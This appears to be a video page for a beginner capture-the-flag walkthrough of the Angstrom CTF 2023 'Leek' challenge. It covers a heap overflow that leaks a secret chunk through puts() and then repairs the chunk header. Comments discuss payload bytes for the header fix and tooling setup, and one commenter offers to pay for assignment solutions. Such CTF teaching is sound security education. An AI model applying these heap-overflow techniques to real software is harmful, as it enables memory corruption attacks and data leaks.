Leaking Secret Data with a Heap Overflow - "Leek" Pwn Challenge [Angstrom CTF 2023]

Рет қаралды 3,308

Күн бұрын

Video walkthrough for the binary exploitation (pwn) challenge, "Leek" from the Angstrom capture the flag (CTF) competition 2023. The challenge involves performing a heap overflow to overwrite all null bytes between our user input chunk and secret data chunk so that when puts() is called, it prints both chunks (there's no null terminator separating them). After this, we need to repair the header of the chunk we modified so that the program can continue execution. We repeat this process of leaking and submitting the random (secret) bytes 100 times, at which point we receive the flag! Write-ups/tutorials aimed at beginners - Hope you enjoy 🙂 #Angstrom #AngstromCTF #CTF #Pentesting #OffSec #Pwn #BinaryExploitation #Reversing #ReverseEngineering
↢Social Media↣
Twitter: / _cryptocat
GitHub: github.com/Crypto-Cat/CTF
HackTheBox: app.hackthebox.eu/profile/11897
LinkedIn: / cryptocat
Reddit: / _cryptocat23
KZfaq: / cryptocat23
Twitch: / cryptocat23
↢AngstromCTF↣
ctftime.org/event/1859
2023.angstromctf.com/challenges
/ discord
/ angstromctf
↢Resources↣
Ghidra: ghidra-sre.org/CheatSheet.html
Volatility: github.com/volatilityfoundati...
PwnTools: github.com/Gallopsled/pwntool...
CyberChef: gchq.github.io/CyberChef
DCode: www.dcode.fr/en
HackTricks: book.hacktricks.xyz/pentestin...
CTF Tools: github.com/apsdehal/awesome-ctf
Forensics: cugu.github.io/awesome-forensics
Decompile Code: www.decompiler.com
Run Code: tio.run
↢Chapters↣
Start: 0:00
Patch lib-c (pwninit): 0:20
Test the program functionality: 1:05
Check the binary protections (checksec): 1:37
Analyse decompiled code (ghidra): 2:57
Recap of analysis: 6:51
PwnTools script: 8:40
Setup breakpoints: 14:38
Debug with GDB (pwndbg): 15:33
Heap recap (chunk structure): 16:20
Reviewing vulnerability / exploit: 18:01
Finish PwnTools script: 20:40
Test against remote server: 24:13
Final recap: 25:07
End: 25:56

Пікірлер: 28

@0xLoevland Жыл бұрын

Nice work! It makes sense now why the challenge was called "Leek" xD I ended up solving it by overwriting the secret and then "guess" it, instead of leaking the secret

@_CryptoCat Жыл бұрын

Never thought of that but it's also a great solution!

@didko258 Жыл бұрын

just searched "binary exploitation" and saw that you have posted a new video. Can't wait to check it out. :D

@_CryptoCat Жыл бұрын

Thanks! It's been a while 😅

@didko258 Жыл бұрын

😄

@markuche1337 Жыл бұрын

Great walkthrough 😅

@_CryptoCat Жыл бұрын

ty 🙏🥰

@sinner7788 Жыл бұрын

Great work! I’d love to see a walkthrough of ‘widget’ by you, I got 30% through with exploiting it, but then got stuck infinitely😅

@_CryptoCat Жыл бұрын

Thanks mate! 🙏 I only got chance to do a few challs this time around.. couple of web and couple of pwn 😁

@iri5h Жыл бұрын

Hey. Where do you get the ld-linux-x86-64.so.2 and libc.so.6 files? I tried spinning up a docker of the correct versions and coping those over but after using pwninit the program just seg faults.

@_CryptoCat Жыл бұрын

Hmmm I already had them saved but pretty sure that's where they came from (an Ubuntu docker container) 🤔

@sonson-br8mx Жыл бұрын

kewlll

@_CryptoCat Жыл бұрын

😎

@trunglongng4237 Жыл бұрын

Sir, please create a video about priv escalation. Thank you ❤

@_CryptoCat Жыл бұрын

Hmmm quite a few of my hackthebox vids have featured priv esc, e.g. the battlegrounds ones, but it's a huge topic.. even if you break it down into linux vs windows 😆

@trunglongng4237 Жыл бұрын

@@_CryptoCat linux, please, sir. I did the monitortwo in hack the box but still need some hints for PE so i still not clearly. hope you find and do a same thing. have a nice day

@moshedo7975 Жыл бұрын

When you fix the payload you put 6 "\x00" after the 0x31 why not 7 "\x00" ?

@_CryptoCat Жыл бұрын

Damn.. good question! I just went back and re-tested the exploit and 6 or 7 * "\x00" both work fine, but any less than 6 null bytes fails 🤔 I didn't think about this at the time but it makes sense, since the chunk metadata has 8 bytes for the chunk size *and* some flags, e.g. to indicate if the previous chunk is in use. Therefore, I guess we only need to take care of 7 bytes for the size (\x31 + (\x00 * 6)). The last byte would overwrite those flags 🙂

@ucanh8173 7 ай бұрын

Why we have to + (b'\x00' * 6) after b'\x31' ? I though we have to overwrite the exact data until we meet the next null character ? If we + (b'\x00' * 6) , do we overwrite the data of the second chunk with ( '\x00' * 6 ) ?

@user-rg8uf7nj7h 9 ай бұрын

i got the same error that glibc and try to install the latest version not working am using parrot latest any other ways.....

@_CryptoCat 9 ай бұрын

Hi mate, if you are getting errors about GLIBC 2.34 you can download these files to the same directory and then use pwninit to point the challenge to the correct files: github.com/Crypto-Cat/CTF/tree/main/pwn/GLIBC_2.34

@user-rg8uf7nj7h 9 ай бұрын

@@_CryptoCat pwninit sorry i don't get it

@_CryptoCat 9 ай бұрын

@@user-rg8uf7nj7h Check this out: github.com/io12/pwninit - basically you can patch the challenge binary to use a Lib-C version of your choice. Quite often CTFs will give you a copy of the Lib-C library, in which case pwninit is very useful. I made some small modifications to mine but the one on the github should work fine!

@darkshadow_boy 9 ай бұрын

@@_CryptoCat can you share yours

@_CryptoCat 9 ай бұрын

@@darkshadow_boy Oh actually my bad, I'm using the default pwninit binary but I have a bash alias setup: pwninit='/home/crystal/apps/pwninit --template-path ~/.config/pwninit-template.py; sed -n "4,6p" solve.py; rm solve.py; mv *_patched $1' where '~/config/pwninit-template.py' is: from pwn import * {bindings} context.binary = {bin_name} def conn(): return process({proc_args}) def main(): r = conn() if __name__ == "__main__": main()

@user-ie7sq8gp5q Жыл бұрын

Yo dude, love the work and effort you put into these. You really do know a thing or two lad and teaching us all your wisdom. I have an assignment to do for uni by Wednesday on HackTheBox. Completed 5 machines already, but I'm literally stuck on the very easy ones (Certifried and Liberty) literally fried my brain trying to figure them out. Any advise would be greatly appreciated. If you find the solution for them (will probs take you 5 mins? 10 tops) as well I'll legit pay you 😂 Certifried is smb from what I gather and Liberty nginx vuln?!